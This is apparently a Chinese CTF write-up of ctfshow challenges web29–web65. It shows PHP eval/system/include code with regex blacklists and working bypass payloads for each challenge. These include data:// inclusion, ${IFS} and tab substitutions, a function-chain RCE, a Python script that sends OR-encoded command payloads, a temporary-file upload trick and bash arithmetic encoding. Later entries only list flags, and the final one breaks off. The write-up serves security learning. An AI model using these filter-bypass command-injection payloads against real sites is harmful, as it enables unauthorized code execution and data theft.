web29

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

只过滤了flag和大小写

构造payload

?c=system("ls");
?c=system("tac f*");

拿到flag

ctfshow{6d1da9c5-aa80-41c1-aca0-6dfb3ec8a7ea}

web30

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,system,php,大小写

system可用passthru或者echo(``)代替,

构造payload

?c=echo(`ls`);
?c=echo(`tac f*`);

拿到flag

ctfshow{a14dacd0-b579-4d77-a64f-1ddc760722c1}

web31

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,system,php,cat,sort,shell,.,空格,‘,大小写

用%09(tab)代替空格,

构造payload

?c=echo(`ls`);
?c=echo(`tac%09f*`);

拿到flag

ctfshow{7cca93ab-0233-48d6-9534-ed516600e091}

web32

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

相比web31,更多过滤了echo,,;,(

尝试使用文件包含绕过

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac flag.php");?>

得到flag

ctfshow{ee520f6e-ba0a-4c01-9411-05a02420baeb}

web33

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

一招鲜,吃遍天

构造payload

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac f*");?>

得到flag

ctfshow{078e0c80-b526-41ad-80a3-426b1faced5a}

web34

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

多禁了个:,没影响,一招鲜,吃遍天

?c=include$_GET[b]?>&b=data://text/plain,<?php system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?php system("tac f*");?>

得到flag

ctfshow{c6471ed6-6e2c-4103-8171-2d1d6298f9e3}

web35

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

一招鲜,吃遍天

?c=include$_GET[b]?>&b=data://text/plian,<?= system("tac f*");?>

得到flag

ctfshow{9802f18a-bb60-45b7-b3e2-e72894a4f1b7}

web36

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

多禁用了数字,一招鲜吃遍天

?c=include$_GET[b]?>&b=data://text/plain,<?= system("ls");?>
?c=include$_GET[b]?>&b=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{ab182bac-0440-438a-9479-3a50e21354b6}

web37

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

从这开始就跟文件包含很像了

构造payload

?c=data://text/plain,<php= system("tac f*");?>

得到flag

ctfshow{25683191-dc1b-4628-8957-a54c4c633341}

web38

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

过滤了php

构造payload

?c=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{1d7d8f52-2253-40b7-826c-06b8d6d88800}

web39

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

照样能用

?c=data://text/plain,<?= system("tac f*");?>

得到flag

ctfshow{a32ae679-0b72-47e4-b938-f04da301825c}

web40

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/


if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

拿到题目,被过滤的东西有不少,仔细一看,之前能用的符号基本都被禁了,但自习一看还给留了一对(),禁用的是中文(),这就需要我们采用各种函数构造payload

这里先记住一个payload

?c=eval(next(reset(get_defined_vars()));&1=system("ls");
?c=eval(next(reset(get_defined_vars()));&1=system("tac f*");

然后接着看这些函数的作用

eval()//代码执行
next()//这个函数将数组内部指针向前移动一位,并返回当前指针处的元素值。
reset()//这个函数将数组内部指针指向第一个元素,并返回该元素的值。
get_defined_vars()//这个函数返回当前所有已定义变量的数组,包括局部变量和全局变量。

第二种方法,比较容易理解

?c=highlight_file(next(array_reverse(scandir(getcwd()))));

分析为什么这么做

首先我们要看目录

使用

?c=print_r(scandir(getcwd()));

我们得到

Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

这时候,我们使用翻转数组的函数array_reverse,数组就会变成

Array ( [0] => index.php [1] => flag.php [2] => .. [3] => . )

接下来就是读取[1]中的数据

使用next(),指向[1],再用highlight_file读取flag

但这个方法如果flag在中间,不好轻易得到就不好用了

得到flag

ctfshow{b93dd03b-4a96-4443-932b-c298d5ba0f28}

web41

与或非绕过

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

没有禁用|,借助脚本

import re
import urllib
from urllib import parse
import requests

# 初始化一个列表来存储编码后的字符信息
contents = []

# 遍历所有可能的ASCII字符(从0x00到0xFF)
for i in range(256):
    for j in range(256):
        # 将整数i和j转换为两位的十六进制字符串(如:'00'到'ff')
        hex_i = '{:02x}'.format(i)
        hex_j = '{:02x}'.format(j)
        
        # 编译一个正则表达式,用于检测需要特殊处理的字符
        preg = re.compile(r'[0-9]|[a-z]|\^|\+|~|\$|\[|]|\{|}|&|-', re.I)
        
        # 如果当前字符是需要特殊处理的字符,则跳过本次循环
        if preg.search(chr(int(hex_i, 16))) or preg.search(chr(int(hex_j, 16))):
            continue
        
        # 否则,将字符转换为百分号编码格式(如:'%20'代表空格)
        a = '%' + hex_i
        b = '%' + hex_j
        
        # 计算两个十六进制值按位或运算的结果,并确保结果是一个可打印的字符
        c = chr(int(a[1:], 16) | int(b[1:], 16))
        
        # 只保留ASCII码在32到126之间的字符(即可打印字符)
        if 32 <= ord(c) <= 126:
            contents.append([c, a, b])  # 将字符、其百分号编码形式以及备用编码形式添加到列表中

# 定义一个函数,用于生成payload
def make_payload(cmd):
    payload1 = ''  # 初始化第一个payload字符串
    payload2 = ''  # 初始化第二个payload字符串
    
    # 遍历给定命令的每一个字符
    for char in cmd:
        # 在contents列表中查找与当前字符匹配的项
        for item in contents:
            if char == item[0]:  # 如果找到了匹配的项
                payload1 += item[1]  # 添加其百分号编码形式到payload1
                payload2 += item[2]  # 添加其备用编码形式到payload2
                break  # 找到匹配项后跳出循环
                
    # 返回一个字符串,其中包含了原始的和备用的十六进制编码,以括号包围
    return '("' + payload1 + '"|"' + payload2 + '")'

# 获取用户输入的URL
URL = input('url:')

# 创建payload,首先对'系统'命令进行编码,然后对'cat flag.php'命令进行编码
payload = make_payload('system') + make_payload('cat flag.php')

# 发送POST请求到指定的URL,数据中包含编码后的payload
response = requests.post(URL, data={'c': urllib.parse.unquote(payload)}, verify=False)

# 输出服务器的响应文本
print(response.text)

得到flag

ctfshow{fb643932-138c-459d-982c-1940774a9003}

web42

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

开始了新的一种

自动带了个system();我们只需要给c传命令语句就行了,

但后面带了个>/dev/null 2>&1”,得想办法让他不影响语句

有很多种过滤方法,最普通的往后面加;

或者加||,%0a等

这里构造payload

?c=ls;
?c= tac f*;

得到flag

ctfshow{538f23e2-488b-4087-a142-61ae3509ccd7}

web43

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

相比上题,把;cat过滤了

我们使用||或%0a结尾,

构造payload

?c=ls%0a
?c=tac f*%0a

得到flag

ctfshow{e634303d-c8d5-4c77-8d5f-cf7df77a5da5}

web44

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了flag,用f*,fla?????代替

构造payload

?c=tac f*%0a

得到flag

ctfshow{fe5488e7-8429-4bbe-a324-58979c9b688b}

web45

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

过滤了空格,用%09或者&{IFS}代替,构造payload

?c=tac%09f*%0a

得到flag

ctfshow{e9c6696b-a4f0-4e09-bedc-52ebf8dae4f4}

web46

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

看似是过滤了数字,实际上并不影响%0a,%09的使用,因为是先编码后过滤,过滤了*,就用?

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{801863f2-cae8-4f4a-9f63-361f80e28622}

web47

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

禁用了更多的函数

我们用不到

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{e37e71b9-7e6c-4b70-803a-72b828cb38ff}

web48

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

没啥影响,还是上一题的payload

?c=tac%09fla?????%0a

得到flag

ctfshow{b4d605ba-2643-4da1-ac1f-cd8db35f33fb}

web49

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

没啥影响啊,还是接着这样做

构造payload

?c=tac%09fla?????%0a

得到flag

ctfshow{034b29e1-fe7b-4366-8ea4-29340c5cc930}

web50

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

把%09禁用了,我们使用<

构造payload

?c=tac<fl%27%27ag.php||

得到flag

ctfshow{aa42bf15-c3ea-4416-a1db-8fc128ee1a3f}

web51

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:42:52
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

把tac给禁了,我们换一种,用nl

构造payload

?c=nl<fl%27%27ag.php||

在源代码中找到flag

ctfshow{1e67b744-e71e-4b6c-9b14-ccfe641388d8}

或者用另一种函数rev,反向输出,最后将flag翻转一下即可

web52

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:50:30
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

把<给禁用了,但是没有禁$,那就用${IFS},

构造payload

?c=nl${IFS}fl%27%27ag.php||

结果发现


 1	<?php
 2	
 3	/*
 4	# -*- coding: utf-8 -*-
 5	# @Author: h1xa
 6	# @Date:   2020-09-05 20:49:44
 7	# @Last Modified by:   h1xa
 8	# @Last Modified time: 2020-09-05 20:49:53
 9	# @email: h1xa@ctfer.com
10	# @link: https://ctfer.com
11	
12	*/
13	
14	
15	$flag="flag_here";

flag不在这个文件里

我们往上级的目录翻一翻

?c=ls${IFS}/||

在这里,我们看到了有一个flag文件夹,打开看看

?c=nl${IFS}/fla''g||

果然找到了flag

ctfshow{953e2696-21d2-4264-8511-f58e9a9f593c}

web53

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 18:21:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}

就改了一下,结尾不用再加||了,构造payload

?c=rev${IFS}fla?????

得到翻转flag

}bccba0f9d27e-d499-0044-1d2d-40920210{wohsftc"=galf

web54

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:43:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

完全意义上的过滤,真正的不能用这些东西,

用翻转读取

?c=rev${IFS}fla?????

得到翻转flag

}d05c4c51b088-914b-4fc4-6c3d-a609a5e0{wohsftc"=galf

web55

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 20:03:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

过滤了字母,我们采用临时文件上传漏洞

先写一个文件上传网页

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="https://62170708-6917-4055-af84-98fa1cea65aa.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

使用时将网址改一下,上传一个txt文件,抓包,添加内容

:8080 //添加端口
?c=.%20/???/????????[@-[] //POST /后添加

得到响应

HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 05 Jul 2025 12:25:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.11
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Max-Age: 1728000
Content-Length: 278

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{d70c8c28-7f40-435b-a1c2-4ac398524812}";

得到flag

web56

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}

把字母和数字都过滤了,还是采用临时文件上传漏洞

HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Sat, 05 Jul 2025 12:28:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.3.11
Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: Content-Type,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Authorization,x-auth-token,Cookies,Aaa,Date,Server,Content-Length,Connection
Access-Control-Max-Age: 1728000
Content-Length: 278

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{f3529264-fef3-4cfd-a23f-5e393e66a3be}";

得到flag

web57

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-08 01:02:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

// 还能炫的动吗?
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}

很贴心的告诉说flag在36.php,

system()里还给加了cat和.php,意思就是说让我们传一个c=36进去,但数字和字母都被禁用了,小数点也不能用,那就用$,(,),~构造出一个36

最后得到payload

?c=$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

在源代码里找到了flag

ctfshow{c2e0ce65-2ce8-4f98-857a-84e3e283f3e9}

web58

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

从这开始,就变成post传参,过滤未知,第一题应该不难,

首先扫一下目录

c=print_r(scandir("/"));
Array ( [0] => . [1] => .. [2] => .dockerenv [3] => bin [4] => dev [5] => etc [6] => home [7] => lib [8] => media [9] => mnt [10] => opt [11] => proc [12] => root [13] => run [14] => sbin [15] => srv [16] => sys [17] => tmp [18] => usr [19] => var )
c=print_r(scandir("."));
Array ( [0] => . [1] => .. [2] => flag.php [3] => index.php )

发现了flag.php

读一下

c=show_source("flag.php");

得到flag

ctfshow{e096b4bc-0826-44e0-b101-1fb162547b16}

web59

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{a5d88224-d570-4062-a1a4-e46e1d275112}";

还是show_source,能用就一直梭

web60

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{203e5e58-5d97-4b43-8cd0-1660cb486a59}";

web61

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{fa868657-0163-4778-be4c-835e230eff14}";

web62

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{b5f749b6-3bcf-417c-8d8f-53c103474a90}";

web63

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{84d32eaf-9e32-4473-91b2-7f66586e7783}";

web64

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


$flag="ctfshow{61c74961-28b3-4b2a-8e49-8c9e1c00702d}";

web65

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-07 19:40:53
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 19:41:00
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


